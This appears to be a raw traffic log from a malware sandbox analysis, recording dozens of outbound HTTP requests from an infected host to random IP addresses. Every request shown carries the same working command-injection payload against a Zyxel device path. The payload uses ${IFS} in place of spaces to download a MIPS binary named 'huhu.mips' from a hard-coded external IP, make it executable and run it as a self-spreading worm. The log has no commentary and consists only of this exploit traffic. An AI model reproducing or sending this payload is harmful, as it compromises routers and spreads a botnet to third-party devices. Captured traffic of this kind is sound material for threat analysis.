                                                      Feb 2, 2024 06:36:14.084548950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9633192.168.2.145118258.210.17.0443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.084587097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9634192.168.2.1442260166.115.0.13443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.084631920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9635192.168.2.145940694.137.146.125443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.084664106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9636192.168.2.144922479.193.59.219443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.084711075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9637192.168.2.1448308164.235.45.33443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.084754944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9638192.168.2.145292018.12.12.177443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.084790945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9639192.168.2.1445210161.90.67.165443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.084839106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9640192.168.2.144790649.144.186.217443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.084887028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9641192.168.2.145463080.120.18.112443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.084932089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9642192.168.2.144140273.199.175.252443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.084976912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9643192.168.2.143657296.121.159.13443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.085025072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9644192.168.2.1460394113.25.31.203443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.085057974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9645192.168.2.144752089.77.253.177443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.085108995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9646192.168.2.143315846.35.215.241443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.085144997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9647192.168.2.145828277.149.12.45443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.085174084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9648192.168.2.145852868.148.199.22443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.085222960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9649192.168.2.1460910188.34.98.104443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.085269928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9650192.168.2.145641013.187.115.17443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.085313082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9651192.168.2.1457600119.243.24.70443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.085338116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9652192.168.2.145934239.142.214.124443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.085380077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9653192.168.2.1433552153.224.200.66443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.085416079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9654192.168.2.144155067.201.212.162443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.085464001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9655192.168.2.145771272.138.64.48443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.085490942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9656192.168.2.1455768152.149.15.155443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.085530043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9657192.168.2.1455480103.3.161.195443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.085566998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9658192.168.2.1442138122.0.80.192443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.085623980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9659192.168.2.145808420.5.119.199443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.085653067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9660192.168.2.144394251.3.185.27443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.085711002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9661192.168.2.1436608208.153.215.28443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.085741997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9662192.168.2.1442756171.237.60.21443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.085798979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9663192.168.2.145088420.20.81.173443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.085839987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9664192.168.2.143508487.143.123.200443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.085844040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9665192.168.2.144753468.165.74.37443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.085911989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9666192.168.2.1459412187.20.144.95443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.085939884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9667192.168.2.143301834.234.145.109443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.085967064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9668192.168.2.1438258146.38.187.59443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.086014986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9669192.168.2.143433894.199.199.169443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.086044073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9670192.168.2.1449078164.183.75.12443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.086085081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9671192.168.2.1440624104.34.115.97443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.086126089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9672192.168.2.1433406193.205.122.226443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.086162090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9673192.168.2.1444452220.7.174.21443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.086215019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9674192.168.2.1444388191.38.237.197443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.086251974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9675192.168.2.1436048218.162.52.226443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.086283922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9676192.168.2.14351585.45.104.49443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.086328983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9677192.168.2.144430450.145.76.112443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.086378098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9678192.168.2.1442504120.243.205.109443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.086416960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9679192.168.2.1452578168.154.21.157443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.086462021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9680192.168.2.143509884.171.205.17443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.086508036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9681192.168.2.1436784116.195.111.184443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.086555004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9682192.168.2.1449160135.12.86.58443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.086596966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9683192.168.2.144966879.18.163.25443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.086631060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9684192.168.2.145380067.43.142.12443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.086663008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9685192.168.2.1449346136.138.246.105443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.086690903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9686192.168.2.1457878114.245.3.177443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.086735964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9687192.168.2.1438504131.1.215.185443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.086771965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9688192.168.2.1435820100.254.247.121443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.086826086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9689192.168.2.144427469.60.95.225443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.086863995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9690192.168.2.1445928219.189.62.54443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.086894989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9691192.168.2.145003039.204.98.190443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.086925030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9692192.168.2.145581644.24.26.226443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.086965084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9693192.168.2.1444914149.36.143.239443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.087016106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9694192.168.2.145563048.138.217.197443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:14.087043047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9695192.168.2.1450854111.131.130.243443
                                                      TimestampBytes transferredDirectionData
